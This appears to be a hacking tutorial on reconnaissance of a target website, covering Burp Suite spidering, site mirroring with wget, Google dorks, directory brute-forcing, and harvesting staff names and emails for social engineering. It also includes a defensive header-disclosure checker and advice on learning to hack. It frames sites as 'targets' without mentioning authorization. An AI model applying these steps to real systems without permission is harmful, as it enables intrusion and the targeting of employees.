Burp Suite spidered some important links which we need for later attacks (directories, login page, forgotten password pages, robots.txt, etc.).

Configuring Burp Suite to spider the web:

1. Open Burp Suite.
2. Configure your browser to use Burp Suite as a proxy. Firefox: Preferences >> Advanced >> Network >> Settings >> Manual proxy configuration, then enter host: localhost and port: 8080

Screenshot:

3. Now browse your target website. You will see your target address in the Burp Suite proxy's target menu.
4. Now right-click on your target host in Burp, then click "Spider this host".

Screenshot:

Now it will spider the website. Note: play more with Burp Suite.

Now we know how to configure the browser for Burp Suite and spider the target host. So let's continue gathering information.

It is even better to download the entire website using wget or another downloader, so that we can browse it offline and see the page source code, comments, etc. Besides, we may need to brute force a web form or something else and create a word list from the target site. So I simply use wget:

wget -r www.target.com

It will download the full website. Now browse all the pages, look at the source code, comments, etc., and see if you get any good information.

Information Gathering with Google:

Google is a very powerful search engine and a friend of hackers and penetration testers. We can easily gather a lot of information with Google, such as all public information, emails, parameters of the site, names, phone numbers, etc.

If we search on Google with the 'site' operator, we get many results:

https://www.google.com/#sclient=psy-ab&hl=en&source=hp&q=site:microsoft.com&fp=2f63d2df457619ac

Click on the link and you will see.

I searched for site:microsoft.com, which is why it discovered subdomains. But if we search for "site:www.microsoft.com", we will see results only from www.microsoft.com, not from other sub-domains such as login.microsoft.com.

More examples:
site:www.targets.com filetype:asp
site:www.targets.com inurl:index.php
site:targets.com error
site:targets.com admin
link:targets.com
related:targets.com

You will find many Google dorks at: http://www.exploit-db.com/google-dorks/
Don't be lazy if you are serious.

There are some tools for automated searching, but I always prefer doing it manually.

So suppose you found a URL like www.target.com/index.php?id=2 with a search engine. Isn't it easy to quickly check for invalid input on the "id" parameter (such as SQLi)?

Finding hidden files and content, default files:
You should browse all pages manually and review the behavior of all pages. Here are some points you can follow:
1. Brute force/dictionary attack for hidden directories. You can use Burp Suite or OWASP DirBuster (I will post tutorials for all the tools later).

2. If you find a link like www.target.com/login.php, there may also be a logout.php; or if there is a www.target.com/adduser.php, then www.target.com/deleteuser.php may also exist… So try.

3. Look at the comments in the page source for any interesting information.

4. Find the login pages (admin + users).

5. Find all URLs and save them in a file for later use.

6. Find default files and content (what about www.target.com/phpinfo.php?).

7. I think you had better run Nikto against the site. Nikto is a powerful tool for discovering default content.

Finding other information:
What is other information?

1. Email (social engineering attack).

2. Phone numbers (social engineering).

3. User and employee names (social engineering).

4. Find out the web server version. What version of Apache or IIS are they using? If it is old, then you may be lucky enough to find a known vulnerability against the old software on exploit-db or SecurityFocus.

5. What type of web software are they using? Joomla, MyBB, phpBB, vBulletin or something else? Do you know what version? If it is old, then you may search for vulnerabilities that have already been discovered.
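Site owners can check what their own responses give away about the server and web software versions in points 4 and 5. The following is an added example, not code from the original post: it audits a raw HTTP response for version-revealing headers and a generator meta tag. Both responses and every version string in them are constructed for illustration.

```python
import re

# Constructed responses for illustration; the version strings are made up.
VERBOSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.2.3 (CentOS)\r\n"
    "X-Powered-By: PHP/5.2.17\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    '<html><head><meta name="generator" content="Joomla! 1.5"></head></html>'
)
HARDENED = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><head><title>Home</title></head></html>"
)

VERSION_RE = re.compile(r"\d+(?:\.\d+)+")
GENERATOR_RE = re.compile(
    r'<meta\s+name=["\']generator["\']\s+content=["\']([^"\']+)["\']', re.I)

def audit_disclosure(raw_response):
    """Return (source, value) pairs that reveal software names or versions."""
    head, _, body = raw_response.partition("\r\n\r\n")
    headers = {}
    for line in head.split("\r\n")[1:]:           # skip the status line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    findings = []
    server = headers.get("server", "")
    if VERSION_RE.search(server):                 # a bare product name is not flagged
        findings.append(("Server", server))
    if "x-powered-by" in headers:                 # any value names the stack
        findings.append(("X-Powered-By", headers["x-powered-by"]))
    m = GENERATOR_RE.search(body)
    if m:
        findings.append(("meta generator", m.group(1)))
    return findings

if __name__ == "__main__":
    print(audit_disclosure(VERBOSE))
    print(audit_disclosure(HARDENED))
```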

I think you now have a basic idea of how to gather information and why you need to gather it. Without gathering information we can’t map our target. For example, it is like not knowing how our victim walks or whether he knows kung fu (if he knows kung fu, then we also need to be more powerful than him, such as by becoming an expert kung fu fighter).
These are not the only techniques for gathering information. You need to research your target more, learn more information-gathering techniques, and use your powerful friend Google. I don’t think it is possible to discover a wealth of information within a short time. Personally, I spend a lot of time familiarizing myself with my target, and a long time gathering information and mapping the target. If you are a skid/script kiddie and want to hack just for fun, or it is not important to you, then surely you have no patience or time for mapping your targets. But a serious hacker will spend lots of time (most of his time) on his targets. At least I hope that I explained most of the important things you need.

WITHOUT THIS INFORMATION YOU SHOULD NOT GO AHEAD.

Good Luck

How to learn Hacking or becoming a hacker


I don’t know how much of an expert I am, but I believe these are enough for becoming a hacker, and I always try to follow them. So I am just sharing them with you.

A) Programming:

1. Python/Perl: Learn the Python or Perl programming language. You need one of these two languages. Do you know why? For example, for creating exploits, making custom tools, etc.

2. C/C++: You should know this language, because it will help you in many ways. It is a powerful language. Perhaps you already know that most complex and powerful software is coded in C/C++. And the Linux/Unix operating systems are written in the C language. For finding exploits or making some nasty things you need this language.

3. Assembly language: AH!!! Worried? Don’t worry. It is not too hard to learn to read or understand the code. You really need asm if you are more serious about hacking. Without assembly language you will not be able to find 0days against software, because a debugger only outputs asm code. Actually you don’t need to be a coder, but you should be able to read it and understand it… Also, if you want to know how a computer works internally, then the best way is to learn asm. So go with Intel syntax and nasm.

4. PHP/SQL/JavaScript/HTML: If you want to move to web hacking, then learn at least 2 languages (PHP and MySQL). For example, if you found a PHP code injection vulnerability, how will you exploit it? The clear answer is that you need PHP knowledge. And if you want to attack the client side, then you need JavaScript and HTML knowledge, for example for exploiting password-protected HTML pages, cross-site scripting, exploiting CSRF, etc. Have you ever heard about SQL injection? Guess why I told you to learn SQL. Even if you want to find 0days for other frameworks like WordPress, Joomla, etc., then you must have PHP/MySQL knowledge.

But if you are not serious about hacking and want to hack only for fun, then some tools will do the job for you (this is called being a skid or script kiddie). But be aware that most of the time (85%) you will fail.

B) Networking:
Hackers hack over the network (Internet?). So guess why you need to learn networking. You have to understand how to connect and get familiar with ports, protocols, etc. I suggest you learn:
1. How networks work + TCP/IP.
2. Protocols and ports.
3. The OSI model.
C) Operating System:
Of course, without an operating system nothing is possible. And you must learn about operating systems deeply. You should be very good with various OSes. Gain some internal knowledge about the operating system. Run all the existing tools of an OS. See how it works.
1. Linux: Ah, Linux is my first choice. I love the Linux OS. It is open source. Hackers should choose an open source operating system so that they can see the source code, modify it, run various open source tools, etc. I can’t explain lol, get it right now!
2. Windows: The favorite target operating system for hackers. A lot of bugs and users all over the world. Not open source. So you should learn it well. I still read Windows assembly language and Windows internals books instead of Linux ones.
3. Mac: You may need it. But really, I don’t know much about Mac.
D) LAB:
1. Install 2 target operating systems: Linux (get Ubuntu, Debian, Fedora, Red Hat, openSUSE, etc.) and Windows. Don’t be a fucker like some trainers who work with Windows only because it is easy to exploit. So Linux is also your target.
2. Install various software and tools. Run them. Learn them. See how they work. Install some security software and attack your target system (Metasploit, nmap, etc.).
3. Install various networking software such as http, ftp, pop3, smtp, rdp, ssh, nntp, etc., and attack them and try to break them. Try to find some bugs such as BOF with fuzzers. Also install other software for web hacking such as VB, MyBB, phpBB, Joomla, etc., and run various tools against these applications.
E) Journey:
Now you know what is going on, and it is time to start the journey. Now read some security/hacking books and search on Google, and you will see that most security holes come from programming and networking problems. You will learn very fast. Just remember that the journey will not end. So be careful to take enough food (programming + networking + OS + motivation + patience) before starting the long journey.

Don’t give up!

Hope you will be one more genius!!!